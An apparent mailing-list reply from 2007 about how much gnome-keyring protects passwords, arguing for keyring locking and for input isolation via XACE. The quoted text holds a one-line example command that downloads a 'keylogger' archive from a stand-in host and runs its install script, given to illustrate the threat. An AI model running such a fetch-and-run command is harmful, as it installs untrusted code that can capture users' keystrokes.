low-hanging fruit

[David Zeuthen]

Hey,

Ugh, it would be nice if your mail client broke lines properly; it's at
least a mess for me when using Evolution.

On Mon, 2007-08-20 at 13:26 -0400, Colin Walters wrote:
> Unrelated but - in my opinion gnome-keyring adds
> very little in terms of security to this scenario.
> 
> wget http://my.favorite.keylogger.example.com/linux-x86.tgz && \
> tar xzvf *.tgz && sh keylogger/install.sh

Two things

 - It's a fair goal to ensure that users don't have to enter any
   passwords and I think gnome-keyring and other password stores (like
   the one in Firefox) helps with that. Especially if it's automatically
   unlocked when you log in.

   It's also pretty damn convenient that I don't have to type in these
   passwords all the time. Plus I can rest assured that if my laptop
   is stolen, some of my passwords are encrypted (ask blizzard about
   getting his laptop stolen).

   FWIW, I consider it a bug that the password store in e.g. Firefox
   isn't locked the same way we lock gnome-keyring; I know the option
   in Firefox is there but we just uncheck it by default so you get
   plaintext passwords.

   (Of course another solution to the "unlock keyring" problem is just
    to use encrypted home directories)

 - It's just a bug [1] that an unprivileged process like your keylogger
   can grab key presses while the gnome keyring password dialog is
   focused. With things like XACE, we can prevent that and only allow
   privileged applications like e.g. a screen reader / on screen
   keyboard to do this.

   Of course you can now turn this into a discussion about trusted path.

       David

[1] : or misfeature, whatever